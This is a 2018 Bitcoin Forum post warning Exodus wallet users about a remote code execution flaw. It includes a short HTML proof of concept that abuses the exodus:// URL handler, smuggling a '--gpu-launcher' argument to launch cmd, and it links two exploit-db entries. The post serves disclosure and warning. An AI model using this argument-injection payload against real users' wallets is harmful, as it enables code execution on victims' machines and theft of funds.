Bitcoin Forum
November 12, 2024, 12:30:29 AM *
News: Check out the artwork 1Dq created to commemorate this forum's 15th anniversary
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Warning! Exodus RCE (Remote Code Execution) [Safe links]  (Read 95 times)
chrusso (OP)
Member
**
Offline Offline

Activity: 134
Merit: 10


View Profile
April 26, 2018, 09:01:27 PM
Merited by TrumpD (2)
 #1

I don't know if this has been mentioned before in the forums, but take when browsing the web with your Exodus Wallet open. The last version seems to be patched, hence it doesn't seem to be vulnerable.

Here's a safe to try proof of concept of the security flaw:

<!doctype html>
<script>
  window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>

You can save that as HTML if you desire and see how Exodus process the request. Here's also 2 links to exploit-db for more information about the RCE:

- https://www.exploit-db.com/exploits/44357/
- https://www.exploit-db.com/exploits/43899/

Merit is welcome. Safe browsing!
Chris,
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!